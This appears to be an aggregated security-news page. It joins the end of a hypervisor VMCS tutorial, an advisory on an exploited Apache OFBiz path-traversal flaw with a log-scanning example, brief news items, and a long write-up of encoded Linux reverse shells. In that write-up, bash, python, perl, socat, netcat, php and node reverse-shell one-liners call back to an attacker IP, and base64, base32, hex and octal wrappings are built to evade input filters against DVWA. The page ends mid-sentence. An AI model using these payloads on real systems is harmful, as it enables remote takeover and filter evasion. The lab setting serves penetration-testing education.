    UINT64 alignedPhysicalBuffer = (physicalAddress + ALIGNMENT - 1) & ~(UINT64)(ALIGNMENT - 1);
    UINT64 alignedVirtualBuffer = ((UINT64)vmcsRegionBuffer + ALIGNMENT - 1) & ~(UINT64)(ALIGNMENT - 1);
    INFO("Allocated VMCS region with an aligned virtual buffer from %llx\n", alignedVirtualBuffer);

    // read the IA32_VMX_BASIC MSR and write the revision identifier into bits 30:0 of the first 4 bytes
    IA32_VMX_BASIC_MSR vmcsBasicMsr;
    vmcsBasicMsr.All = readMSR(IA32_VMX_BASIC);
    *(UINT32*)alignedVirtualBuffer = vmcsBasicMsr.Fields.RevisionIdentifier;

    // clear the VMCS (launch state = clear) before making it current with __vmx_vmptrld
    if (__vmx_vmclear(&alignedPhysicalBuffer)) {
        ERROR("Failed to clear the VMCS region\n");
        MmFreeContiguousMemory(vmcsRegionBuffer);
        return FALSE;
    }

    // load the VMCS region using the __vmx_vmptrld intrinsic function
    unsigned char returnValue = __vmx_vmptrld(&alignedPhysicalBuffer);
    if (returnValue) {
        ERROR("Failed to load the VMCS region\n");
        MmFreeContiguousMemory(vmcsRegionBuffer);
        return FALSE;
    }

    // update the VM state with the VMCS region
    vmState->vmcsRegion = alignedPhysicalBuffer;
    return TRUE;
}

This is all I’m gonna cover in this post; thanks for sticking around until the end <3 ʕ •ᴥ•ʔ

Read more at: https://otter.gitbook.io/

by HACKLIDO
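
The preflight checks the post above walks through (the CPUID leaf 0 vendor string, the IA32_FEATURE_CONTROL lock and enable bits, the VMXON-pointer constraints, and the revision-identifier write driven by IA32_VMX_BASIC) reduced to portable user-mode C so they can be exercised without a kernel driver. This is an added example, not code from the HACKLIDO post: the CPUID register values and MSR contents are constructed sample inputs, and the bit positions follow the manual excerpts quoted in the post.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* IA32_FEATURE_CONTROL (MSR 0x3A) bits, as quoted from the Intel manual in the post. */
#define FC_LOCK              (1ULL << 0)   /* clear: VMXON #GPs; set: the MSR can no longer be written */
#define FC_VMXON_IN_SMX      (1ULL << 1)
#define FC_VMXON_OUTSIDE_SMX (1ULL << 2)   /* the bit that matters when not running in SMX */

/* CPUID.1:ECX.VMX[bit 5] */
#define CPUID1_ECX_VMX       (1u << 5)

/* Why VMXON would fault, or VMXON_OK if the preflight passes. */
enum vmxon_preflight { VMXON_OK = 0, VMXON_NO_VMX_SUPPORT, VMXON_FEATURE_CONTROL_UNLOCKED, VMXON_DISABLED_OUTSIDE_SMX };

/* Decode CPUID leaf 0: EBX, EDX, ECX (in that order) carry the 12-byte vendor
 * string little-endian, e.g. "GenuineIntel". Returns a static buffer. */
const char *cpuid_vendor_string(uint32_t ebx, uint32_t ecx, uint32_t edx)
{
    static char vendor[13];
    const uint32_t regs[3] = { ebx, edx, ecx };          /* note the EBX, EDX, ECX order */
    for (int i = 0; i < 3; i++) {
        vendor[i * 4 + 0] = (char)(regs[i] & 0xFF);
        vendor[i * 4 + 1] = (char)((regs[i] >> 8) & 0xFF);
        vendor[i * 4 + 2] = (char)((regs[i] >> 16) & 0xFF);
        vendor[i * 4 + 3] = (char)((regs[i] >> 24) & 0xFF);
    }
    vendor[12] = '\0';
    return vendor;
}

/* Portable replacement for the post's multi-character-constant comparison. */
int is_genuine_intel(uint32_t ebx, uint32_t ecx, uint32_t edx)
{
    return strcmp(cpuid_vendor_string(ebx, ecx, edx), "GenuineIntel") == 0;
}

/* The same decision the post's isLockBitSet / isVmxonEnabledOutsideSMX checks make,
 * collapsed into one reason code so a driver can log exactly why it refused to load. */
enum vmxon_preflight vmxon_preflight(uint32_t cpuid1_ecx, uint64_t feature_control)
{
    if (!(cpuid1_ecx & CPUID1_ECX_VMX))
        return VMXON_NO_VMX_SUPPORT;
    if (!(feature_control & FC_LOCK))
        return VMXON_FEATURE_CONTROL_UNLOCKED;      /* VMXON #GPs while the lock bit is clear */
    if (!(feature_control & FC_VMXON_OUTSIDE_SMX))
        return VMXON_DISABLED_OUTSIDE_SMX;          /* bit 2 must be set outside SMX */
    return VMXON_OK;
}

/* IA32_VMX_BASIC (MSR 0x480): bits 30:0 = VMCS revision identifier,
 * bits 44:32 = size in bytes of the VMXON/VMCS regions. */
uint32_t vmx_basic_revision_id(uint64_t vmx_basic) { return (uint32_t)(vmx_basic & 0x7FFFFFFFu); }
uint32_t vmx_basic_region_size(uint64_t vmx_basic) { return (uint32_t)((vmx_basic >> 32) & 0x1FFFu); }

/* The two constraints the manual places on the VMXON pointer:
 * bits 11:0 zero (4 KiB aligned) and no bits beyond the physical-address width. */
int vmxon_pointer_is_valid(uint64_t phys, unsigned phys_addr_bits)
{
    if (phys & 0xFFFULL)
        return 0;
    if (phys_addr_bits < 64 && (phys >> phys_addr_bits) != 0)
        return 0;
    return 1;
}

/* Prepare a VMXON region: zero it, then write the revision identifier into bits 30:0
 * of the first 4 bytes with bit 31 clear. Returns the header written, or 0xFFFFFFFF
 * when the buffer is smaller than the region size the MSR advertises. */
uint32_t prepare_vmxon_region(uint8_t *region, size_t region_len, uint64_t vmx_basic)
{
    if (region_len < vmx_basic_region_size(vmx_basic))
        return 0xFFFFFFFFu;
    memset(region, 0, region_len);
    uint32_t header = vmx_basic_revision_id(vmx_basic);  /* 31-bit value, so bit 31 is already 0 */
    memcpy(region, &header, sizeof header);
    return header;
}

/* Constructed sample inputs (not read from a real CPU): CPUID leaf 0 registers of an
 * Intel part, a locked IA32_FEATURE_CONTROL with VMXON enabled outside SMX, and an
 * IA32_VMX_BASIC advertising revision 4 and 4 KiB regions. */
#define SAMPLE_LEAF0_EBX       0x756E6547u
#define SAMPLE_LEAF0_EDX       0x49656E69u
#define SAMPLE_LEAF0_ECX       0x6C65746Eu
#define SAMPLE_FEATURE_CONTROL 0x5ULL
#define SAMPLE_VMX_BASIC       0x0018100000000004ULL

static uint8_t g_vmxon_region[4096];

int main(void)
{
    printf("vendor: %s\n", cpuid_vendor_string(SAMPLE_LEAF0_EBX, SAMPLE_LEAF0_ECX, SAMPLE_LEAF0_EDX));
    printf("preflight: %d (0 = ok)\n", vmxon_preflight(CPUID1_ECX_VMX, SAMPLE_FEATURE_CONTROL));
    printf("region size: 0x%x, revision: %u\n",
           vmx_basic_region_size(SAMPLE_VMX_BASIC), vmx_basic_revision_id(SAMPLE_VMX_BASIC));
    uint32_t hdr = prepare_vmxon_region(g_vmxon_region, sizeof g_vmxon_region, SAMPLE_VMX_BASIC);
    printf("header written: %u, pointer 0x1000 valid: %d\n", hdr, vmxon_pointer_is_valid(0x1000, 39));
    return 0;
}
```
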

Overview

On September 7, 2024, Cyble Global Sensor Intelligence (CGSI) identified the active exploitation of CVE-2024-32113, a critical path traversal vulnerability in the Apache OFBiz open-source enterprise resource planning (ERP) system. This flaw was initially addressed on April 12, 2024, with a formal patch released on May 8, 2024. CVE-2024-32113 allows Threat Actors (TAs) to execute arbitrary commands by sending specially crafted requests, enabling them to gain unauthorized access and execute arbitrary commands.

On September 4, 2024, the identification of CVE-2024-45195 reignited concerns surrounding Apache OFBiz by revealing a bypass for several previously addressed vulnerabilities, notably CVE-2024-32113. This development has intensified the exploitation of CVE-2024-32113, as attackers exploit the flaw's resurgence to compromise vulnerable systems and deploy malicious payloads. Researchers also observed active exploitation of this vulnerability to deploy the Mirai botnet on the compromised systems.

Cyble Global Sensor Intelligence (CGSI) findings

Cyble Global Sensor Intelligence (CGSI) detected exploitation attempts of CVE-2024-32113 on September 4, 2024. In the instances recorded by CGSI, as illustrated in the figure below, an attacker attempted to access the endpoint /webtools/control/forgotPassword;/ProgramExport through a POST request.

Figure 1 - Screenshot of exploitation attempts observed via CGSI network

Vulnerability Details

Remote Code Execution
CVE-2024-32113
CVSSv3.1: 9.1
Severity: Critical
Vulnerable Software Versions: Apache OFBiz versions before 18.12.13
Description: The affected versions of the Apache OFBiz system contain a Path Traversal vulnerability due to improper limitation of pathnames to a restricted directory.

Overview of the Exploit

The vulnerability arises from a fragmented state between the application's current controller and view map due to the use of different parsing methods for incoming URI patterns.
When attackers send unexpected URI requests, the logic for retrieving the authenticated view map can become confused, granting the attacker unauthorized access. Exploitation occurs when an attacker submits a crafted request to the endpoint /webtools/control/forgotPassword;/ProgramExport, embedding a payload that executes Groovy scripts. This enables arbitrary commands to be run on the server. For instance, a payload could be used to execute the id command, which returns user and group IDs, thereby revealing sensitive information about the server environment.

Figure 2 - Executing Commands with Payload

Mitigation

CVE-2024-32113 affects Apache OFBiz versions prior to 18.12.13. However, version 18.12.13 remains vulnerable to CVE-2024-45195. Therefore, users are advised to upgrade to the latest version, 18.12.16, which addresses both vulnerabilities.

Recommendations

Following are recommendations to defend against the exploitation of CVE-2024-32113 and related vulnerabilities:
- Upgrade Apache OFBiz to version 18.12.16 or the latest version available. This version addresses both CVE-2024-32113 and CVE-2024-45195.
- Configure and deploy a WAF to filter and monitor HTTP requests, blocking attempts that exploit path traversal and other known attack vectors.
- Apply the principle of least privilege to limit the potential impact of any successful exploitation.
- Regularly review logs for unusual activities, such as unauthorized access attempts or suspicious requests to vulnerable endpoints.
Indicators of Compromise

Indicator: 185[.]190[.]24[.]111
Indicator Type: IPv4
Description: Malicious IP

The post The Re-Emergence of CVE-2024-32113: How CVE-2024-45195 has amplified Exploitation Risks appeared first on Cyble.

by CYBLE
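
As an added example (not Cyble's code), the following Python flags access-log requests whose OFBiz control URI carries a ';' path segment that changes which view is resolved, which is the parser mismatch the post describes. The log lines are constructed, and the two-parser model in split_control_views is an assumption for illustration, not OFBiz's actual routing code.

```python
"""Flag Apache OFBiz control-URI requests whose ';' path parameter changes the resolved view."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed access-log lines (not real traffic). The third mirrors the attempts the post
# reports: a POST to forgotPassword;/ProgramExport. The fourth carries a normal ;jsessionid.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Sep/2024:10:01:02 +0000] "GET /webtools/control/main HTTP/1.1" 200 512
10.0.0.5 - - [07/Sep/2024:10:01:03 +0000] "POST /webtools/control/forgotPassword HTTP/1.1" 200 210
203.0.113.9 - - [07/Sep/2024:10:02:17 +0000] "POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1" 200 845
203.0.113.9 - - [07/Sep/2024:10:02:18 +0000] "GET /webtools/control/ProgramExport;jsessionid=ABC123 HTTP/1.1" 302 0
"""

# Common Log Format prefix: client, ident, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
CONTROL_RE = re.compile(r"/control/(?P<rest>.*)$")


@dataclass
class Finding:
    ip: str
    path: str
    controller_view: str   # what a parser that stops at ';' sees (the auth-checked name)
    effective_view: str    # what a parser that treats ';' as a separator resolves


def split_control_views(path: str) -> Optional[Tuple[str, str]]:
    """Model the two URI parsers the post describes for an OFBiz control URI.

    controller_view is the first segment up to ';' or '/', i.e. the name checked against
    the controller's auth rules. effective_view is the last non-empty segment after
    discarding ';key=value' parameters, i.e. the view a separator-based parser lands on.
    Returns None for paths that are not under /control/. (Heuristic, not OFBiz's code.)
    """
    m = CONTROL_RE.search(path.split("?", 1)[0])
    if m is None:
        return None
    rest = m.group("rest")
    controller_view = re.split(r"[;/]", rest, maxsplit=1)[0]
    segments = [s for s in re.split(r"[;/]", rest) if s and "=" not in s]
    effective_view = segments[-1] if segments else controller_view
    return controller_view, effective_view


def scan_log(text: str) -> List[Finding]:
    """Return one Finding per request whose two parses disagree on the target view."""
    findings: List[Finding] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a CLF line; skip rather than guess
        views = split_control_views(m.group("path"))
        if views is not None and views[0] != views[1]:
            findings.append(Finding(m.group("ip"), m.group("path"), *views))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.ip}: {f.path} -> controller sees {f.controller_view!r}, "
              f"resolves to {f.effective_view!r}")
```

A plain ;jsessionid parameter on a legitimate request does not trigger a finding, so this check isolates the view-switching form of the URI rather than every semicolon.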

SonicWall is urging customers affected by CVE-2024-40766 to "please apply the patch as soon as possible."

by ThreatDown

The personal intelligence system is scheduled to roll out next month for the iPhone, iPad and Mac.

by ITPro Today

Scammers are now throwing in the name of the partner of the targeted victim, telling them that their partner is cheating on them.

by Malwarebytes Labs

After reading about the recent cybersecurity research by Richard Fang, Rohan Bindu, Akul Gupta and Daniel Kang, I had questions. While initially impressed that ChatGPT 4 can exploit the vast majority of one-day vulnerabilities, I started thinking about what the results really mean in the grand scheme of cybersecurity. Most importantly, I wondered how a […] The post ChatGPT 4 can exploit 87% of one-day vulnerabilities: Is it really that impressive? appeared first on Security Intelligence.

by Security Intelligence

The 2024 Trustwave Risk Radar Report: Financial Services Sector underscores the escalating threat landscape facing the industry.

by SpiderLabs Blog

The surge of tech sector layoffs in the last two years could have ripple effects across the economy and investment market, according to RBC Capital Markets.

by ITPro Today

In July 2024, KnowBe4 revealed that we had unknowingly hired a North Korean who was pretending to be someone else. We locked down the laptop that was sent to the fake employee within 25 minutes of receiving an alert that he was trying to do something suspicious, and at no time did the North Korean have access to customer data or systems.

by KnowBe4

EU's highest court backs a $14.4 billion tax bill for Apple; Google's penalty for abusing its dominance is also upheld.

by ITPro Today

Oracle's cloud infrastructure growth, driven by AI demand, positions the company for greater investor confidence and market value, despite its underdog status among cloud providers.

by ITPro Today

Researchers flagged a pair of Gallup site XSS vulnerabilities.

by Dark Reading

In this comprehensive overview, you will discover how object storage improves data management, boosts efficiency, and fits in the evolving cloud landscape.

by ITPro Today

Chinese cyberespionage campaign renews efforts in multiple organizations in Southeast Asia, blending tactics and expanding efforts

by Sophos News

Repellent Scorpius distributes Cicada3301 ransomware, using double extortion and targeting global victims since May 2024. We break down their toolset and more. The post Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware appeared first on Unit 42.

by Palo Alto Networks - Unit42

A PRC threat cluster known as "Crimson Palace" is demonstrating the benefits of having specialized units carry out distinct stages of a wider attack chain.

by Dark Reading

Summary

This blog describes some techniques for generating encoded Linux reverse shell payloads (I also have a similar article for Windows). Sometimes, the default (plaintext) payload may not work due to input filtering or the selected binary (e.g. netcat) not being available on the target system. To overcome these problems, I will show some different techniques to encode the payload. Also, I will present a technique where you can use multiple payloads as a one-liner. I will demonstrate this using the Damn Vulnerable Web Application (DVWA) Command Injection challenge with the security level set to Medium and High. Also, the attack approach is from a 100% black box perspective with no prior knowledge of the application input validation or prior knowledge of the binaries available on the target web server.

Source: https://www.amazon.com/HackSwagCo-Reverse-Shell-T-Shirt/

Disclaimer

This article is for informational and educational purposes only, and for those who're willing and curious to know and learn about Security and Penetration Testing. The content may not be used for illegal purposes. If you're ready to learn something new for the good, then read on.

Why this blog?

There is a lot of online information about different payloads that can be used to set up a reverse shell. The most notable is the online reverse shell generator (https://www.revshells.com/). This site is really fantastic; it allows you to dynamically generate reverse shell code for Linux, Windows, or MacOS in a variety of languages including Bash, Python, Powershell, etc.

However, of all the reverse shells in www.revshells.com, only a single one (socat) worked with our implementation of the Damn Vulnerable Web Application command injection lab (security level was set to "high"). When the security level is set to "high", the web server performs extensive input validation, filtering out many characters that are required in the code to spawn a reverse shell.
Additionally, our target web server (DVWA Linux Docker image) does not ship with many binaries. Although in our lab scenario we do have access to socat, we cannot always rely on this.

In the first part, I will show you some encoding techniques to bypass application firewall filtering. Next, we will create a list of multiple reverse shells and encode them all together into a "master" copy-pastable.

Lab environment

This POC consists of 2 machines: an attacker machine (Kali Linux, 192.168.62.187) and a vulnerable Linux web server (DVWA Docker image, 192.168.62.177).

Kali 64-bit [Version 24.2]
IP-Address: 192.168.62.187

DVWA Linux
IP-Address: 192.168.62.177
Docker image: https://hub.docker.com/r/vulnerables/web-dvwa

Part 1: Encoding techniques
Bash reverse shell on DVWA Linux (Security level=Medium and High)

Note: it's possible to skip part 1 and directly start with part 2 (steps 8 till 15)

This article is not about the details of exploiting command injection. You can find more information in my other Medium article: https://medium.com/system-weakness/the-ultimate-pen-tester-guide-to-command-injection-d29fac2f4c3b. We will only use the DVWA command injection vulnerability for illustration purposes. You are allowed to use another way to execute the code snippets in this blog post.

Attack context:
· Target OS: Linux
· DVWA Security level: Medium and High
· Vulnerable web site: http://192.168.62.177/vulnerabilities/exec/

Let's start with confirming we have our command injection vulnerability when the DVWA Security level is set to "Medium".

1. Performed against vulnerable web server, Linux DVWA (Medium security).

Configure your browser to use Burp Suite as an interceptor tool (we used the Burp Suite integrated Chromium browser). If not done yet, set the DVWA security level to 'medium'. Browse to the DVWA Command Injection site (http://192.168.62.177/vulnerabilities/exec/).
Perform the 'ping a device' function on the loopback address or localhost.

The TTL value (64) tells us it's a Linux web server, and we can also see that this ping function sent four ICMP packets. The payload is not reflected in the URL, so we are dealing with a POST request.

Next, we will use the pipe character '|' to trigger the command injection vulnerability. Execute the following command:

127.0.0.1|ls -l

As you can see in the screenshot above, the second "ls -l" command is executed. This means we triggered the command injection vulnerability.

Next, we will use the command injection vulnerability to set up a reverse shell using Bash.

Why Bash?

The answer is simple: the "Bourne Again Shell" is the default shell on most Linux-based Operating Systems. You have about a 99% chance that your Linux target is shipped with /bin/bash.

In the next sections, we will set up the following Bash reverse shells:
Plaintext Bash (DVWA medium)
Base64 encoded Bash (DVWA medium)
Base32 encoded Bash (DVWA medium)
Hexadecimal encoded Bash (DVWA medium)
Octal encoded Bash (DVWA high)

In the last section, we will combine multiple reverse shells:
Base64 encoded multiple languages (DVWA medium)
Octal encoded multiple languages (DVWA medium)

Plaintext

The plaintext Bash payload is straightforward. This payload works up to the DVWA security level Medium.

2. Performed on Kali Linux.

Set up a netcat listener.

nc -nlvp 443

3. Performed on Kali Linux.

Create a plaintext Bash reverse shell payload for your situation. Open a Bash terminal and copy and paste the following code (adjust the ip-address to your Kali Linux address):

attacker=192.168.62.187
port=443
echo """echo \"bash -i >& /dev/tcp/${attacker}/${port} 0>&1\"|bash"""

Our result is the following string:

echo "bash -i >& /dev/tcp/192.168.62.187/443 0>&1"|bash

4. Performed against vulnerable web server, Linux DVWA (Security Level=Medium).

Add the plaintext Bash payload to the command line injection vulnerability.
Use the pipe '|' for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:

127.0.0.1|echo "bash -i >& /dev/tcp/192.168.62.187/443 0>&1"|bash

Check out the netcat terminal:

Stop and restart the netcat listener.

In the next section, we will use different encoding techniques for the basic Bash reverse shell.

Base64 encoding

You may already be familiar with the base64 encoding technique. It converts every 3 bytes into 4 bytes of ASCII. The advantage is that the payload remains relatively short and special characters are neutralized. The base64 binary is part of the GNU Coreutils (https://www.gnu.org/software/coreutils/) and is present in almost all Linux distributions. The disadvantage of base64 is the use of the "+" character. In a URL (GET request), the '+' is seen as a space and must be additionally encoded to %2B.

The base64 encoded payload works up to the DVWA security level Medium.

5. Performed on Kali Linux.

Create the base64 Bash reverse shell payload. Open a Bash terminal and copy and paste the following code:

attacker=192.168.62.187
port=443
echo -n "echo \"bash -i >& /dev/tcp/${attacker}/${port} 0>&1\" | bash" | base64 -w 0

Our result is the following string:

ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjYyLjE4Ny80NDMgMD4mMSIgfCBiYXNo

We will use this string in step 6.

Note: As mentioned earlier, base64 payloads can contain the "+" character. This breaks the payload when you use it in a URL (GET request). In case of GET requests, the '+' character must be encoded separately. You can use the following for this:

attacker=192.168.62.187
port=443
echo -n "echo \"bash -i >& /dev/tcp/${attacker}/${port} 0>&1\" | bash" | base64 -w 0 | sed -e 's/+/%2B/g'

6. Performed against vulnerable web server, Linux DVWA (Security Level=Medium).

Add the payload to the command line injection vulnerability. Use the pipe '|' for the second command to execute, like 127.0.0.1|<paste payload here>.
In our case, the final construct is:

127.0.0.1|echo [paste Base64 code]|base64 -d|sh

Our statement to get a reverse shell:

127.0.0.1|echo ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjYyLjE4Ny80NDMgMD4mMSIgfCBiYXNo|base64 -d|sh

Check out the netcat terminal:

Stop and restart the netcat listener.

Note: If you need to handle GET requests, you must also encode spaces with "+" characters in the URL. In case of GET requests, you can use the following structure.

127.0.0.1|echo+[paste Base64 code]|base64+-d|sh

Base32 encoding

You may have heard about the base32 encoding technique. This encoding scheme is less known than base64. It converts every 5 bytes into 8 bytes of ASCII. Just like base64, the base32 binary is part of the GNU Coreutils (https://www.gnu.org/software/coreutils/). The advantage of base32 over base64 is that it does not use the "+" character in the ASCII output. Secondly, because it is less well known, it is less likely that the string "base32" will be filtered by the web application firewall.

7. Performed on Kali Linux.

Create the base32 Bash reverse shell payload. Open a Bash terminal and copy and paste the following code:

attacker=192.168.62.187
port=443
echo -n "echo \"bash -i >& /dev/tcp/${attacker}/${port} 0>&1\" | bash" | base32 -w 0

Our result is the following string:

MVRWQ3ZAEJRGC43IEAWWSIB6EYQC6ZDFOYXXIY3QF4YTSMROGE3DQLRWGIXDCOBXF42DIMZAGA7CMMJCEB6CAYTBONUA====

We will use this string in step 8.

8. Performed against vulnerable web server, Linux DVWA (Security Level=Medium).

Add the payload to the command line injection vulnerability. Use the pipe '|' for the second command to execute, like 127.0.0.1|<paste payload here>.
In our case, the final construct is:

127.0.0.1|echo [paste Base32 code]|base32 -d|sh

Our statement to get a reverse shell:

127.0.0.1|echo MVRWQ3ZAEJRGC43IEAWWSIB6EYQC6ZDFOYXXIY3QF4YTSMROGE3DQLRWGIXDCOBXF42DIMZAGA7CMMJCEB6CAYTBONUA====|base32 -d|sh

Check out the netcat terminal:

Stop and restart the netcat listener.

Note: If you need to handle GET requests, you must also encode spaces with "+" characters in the URL. In case of GET requests, you can use the following structure.

127.0.0.1|echo+[paste Base32 code]|base32+-d|sh

Hexadecimal encoding

With the xxd tool, plain text can be converted to hexadecimal characters. This technique works well, but it has some disadvantages:
- it is not certain that the xxd binary is on the target
- each byte is converted to hexadecimal and thus the payload becomes twice as large

9. Performed on Kali Linux.

Create the hexadecimal Bash reverse shell payload. Open a Bash terminal and copy and paste the following code:

attacker=192.168.62.187
port=443
echo -n "echo \"bash -i >& /dev/tcp/${attacker}/${port} 0>&1\" | bash" | xxd --ps -c 1024

Our result is the following string:

6563686f202262617368202d69203e26202f6465762f7463702f3139322e3136382e36322e3138372f34343320303e263122207c2062617368

We will use this string in step 10.

10. Performed against vulnerable web server, Linux DVWA (Security Level=Medium).

Add the payload to the command line injection vulnerability. Use the pipe '|' for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is (xxd double dash ps dash r):

127.0.0.1|echo [paste hexadecimal string]|xxd --ps -r|sh

Our statement to get a reverse shell:

127.0.0.1|echo 6563686f202262617368202d69203e26202f6465762f7463702f3139322e3136382e36322e3138372f34343320303e263122207c2062617368|xxd --ps -r|sh

Check out the netcat terminal:

Nothing happened! Unfortunately, our implementation of the DVWA did not ship with the xxd binary.

Note: If you need to handle GET requests, you must also encode spaces with "+" characters in the URL.
In case of GET requests, you can use the following structure.

127.0.0.1|echo+[paste hexadecimal string]|xxd+--ps+-r|sh

Octal encoding

Now we come to my favorite encoding/decoding technique: octal (also known as base 8). This is the only technique with which it has been possible to set up a reverse shell with the DVWA security level set to high. With the printf utility, it is possible to print octal numbers as ASCII characters. For example, printf '\150\145\154\154\157\40\167\157\162\154\144\12' becomes 'hello world'.

This technique has several advantages:
- printf comes with GNU coreutils and is almost always present on Linux targets
- this is a relatively unknown technique and there is a much smaller chance that octal strings will be detected by Web Application Firewalls
- you are allowed to only encode 'key characters' (see part 2 for demonstration)

A disadvantage is that the payload can become quite big. About 3 times bigger than the original plaintext payload, but you can choose to only encode 'key characters'.

You can find an octal encoded PHP web shell payload in my article https://medium.com/@minix9800/command-injection-to-web-shell-in-dvwa-high-security-level-on-linux-97c909c220c9

11. Performed on Kali Linux.

Create the octal Bash reverse shell payload. Open a Bash terminal and copy and paste the following code:

attacker=192.168.62.187
port=443
echo -n "echo \"bash -i >& /dev/tcp/${attacker}/${port} 0>&1\" | bash" | od -b -An -w9999 | sed 's! !\\!g' | sed 's!\\[0]!\\!g'

Our result is the following string:

\145\143\150\157\40\42\142\141\163\150\40\55\151\40\76\46\40\57\144\145\166\57\164\143\160\57\61\71\62\56\61\66\70\56\66\62\56\61\70\67\57\64\64\63\40\60\76\46\61\42\40\174\40\142\141\163\150

We will use this string in step 12.

12. Performed against vulnerable web server, Linux DVWA (Security Level=High).

Add the payload to the command line injection vulnerability. Use the pipe '|' for the second command to execute, like 127.0.0.1|<paste payload here>.
In our case, the final construct is:

127.0.0.1|printf '[octal string]'|sh

Our statement to get a reverse shell:

printf '\145\143\150\157\40\42\142\141\163\150\40\55\151\40\76\46\40\57\144\145\166\57\164\143\160\57\61\71\62\56\61\66\70\56\66\62\56\61\70\67\57\64\64\63\40\60\76\46\61\42\40\174\40\142\141\163\150'|sh

Check out the netcat terminal:

Stop and restart the netcat listener.

Note: If you need to handle GET requests, you must also encode spaces with "+" characters in the URL. In case of GET requests, you can use the following structure.

127.0.0.1|printf+'[octal string]'|sh

Part 2: Concatenate multiple reverse shells

Maybe about 99% of all Linux distros are shipped with Bash. However, you may encounter a "no Bash" system in a CTF competition or in an exam. In the next section, I will show you how to use the encoding techniques with multiple reverse shells.

13. Performed on Kali Linux.

Create a text file including multiple reverse shell one-liners. Open a Bash terminal and copy and paste the following code:

attacker=192.168.62.187
port=443
cat << EOF > /tmp/shells_linux.txt
echo "bash -i >& /dev/tcp/${attacker}/${port} 0>&1" | bash;
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${attacker}",${port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${attacker}",${port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
perl -e 'use Socket;\$i="${attacker}";\$p=${port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
socat exec:'sh',pty,stderr,setsid,sigint,sane tcp:${attacker}:${port};
nc -nv ${attacker} ${port} -e /bin/sh;
echo "bash -i rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ${attacker} ${port} > /tmp/f" | bash;
php -r '\$sock=fsockopen("${attacker}",${port});exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '\$sock=fsockopen("${attacker}",${port});shell_exec("/bin/sh -i <&3 >&3 2>&3");'
echo "(function(){var net = require('net'),cp = require('child_process'),sh = cp.spawn('sh', []);var client = new net.Socket();client.connect(${port}, '${attacker}', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/; // Prevents" >/tmp/node_shell.js
echo '})();' >>/tmp/node_shell.js; node /tmp/node_shell.js
EOF

The size of the /tmp/shells_linux.txt file is about 1480 bytes. In the next step we will encode this file to our needs.

14. Performed on Kali Linux.

Create different encoded representations of the text file from step 13. Open a Bash terminal and copy and paste the following code:

Base64
cat /tmp/shells_linux.txt | base64 -w 0

Base32
cat /tmp/shells_linux.txt | base32 -w 0

Hexadecimal
cat /tmp/shells_linux.txt | xxd --ps -c 1024

Octal
cat /tmp/shells_linux.txt | od -b -An -w9999 | sed 's! !\\!g' | sed 's!\\[0]!\\!g'

Base64 encoding

You may have noticed that the encoded payload is very large. The smallest (Base64) is 1976 bytes. We will continue with the next step only with Base64. I will show you how to reduce the octal payload size later.

15. Performed against vulnerable web server, Linux DVWA (Security Level=Medium).

Add the payload to the command line injection vulnerability. Use the pipe '|' for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:

127.0.0.1|echo [paste Base64 code]|base64 -d|sh

Our statement to get a reverse shell:

127.0.0.1|echo [paste Base64 code]|base64 -d|sh

Result:

We have a reverse shell based on /bin/bash. This is because Bash is our first shell in /tmp/shells_linux.txt.
You can trigger the next reverse shell by starting another netcat listener (nc -nvlp 443) in a new terminal tab, then exit the current Bash reverse shell. You can see the next connection (perl) in terminal tab 'netcat 2'.

Stop and restart the netcat listener.

The use of multiple reverse shells in combination with encoding causes the payload to become very large. The maximum URL length is 2048 characters. So, with a GET request we would only be able to use our base64 payload (1976 characters). We can significantly reduce the length of the payload by encoding only the "key characters".

16. Performed on Kali Linux.

Generate a "hybrid" octal payload string where only the key characters are encoded. Open a Bash terminal and copy and paste the following code:

attacker=192.168.62.187
port=443

We will use the string in the screenshot above in step 17.

17. Performed against vulnerable web server, Linux DVWA (Security Level=High).

Add the payload to the command line injection vulnerability. Use the pipe '|' for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:

127.0.0.1|printf '[octal string]'|sh

Our statement to get a reverse shell:

We have our reverse shell!

I hope you found this interesting and can use this knowledge yourself during pentest assignments. In my next blog post I will show you how you can use similar techniques with Windows targets.

Linux reverse shell that (almost) always works. was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups
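
As an added example that is not part of the original post, the following Python peels the four wrappings the post demonstrates (echo|base64 -d, echo|base32 -d, echo|xxd --ps -r, and printf with \NNN octal escapes plus the argument-less %.s digit stopper) so a submitted parameter can be matched on its decoded content rather than its encoded form. The sample parameter values are constructed (the base64 one is the post's own string), and the indicator list is an assumption for illustration.

```python
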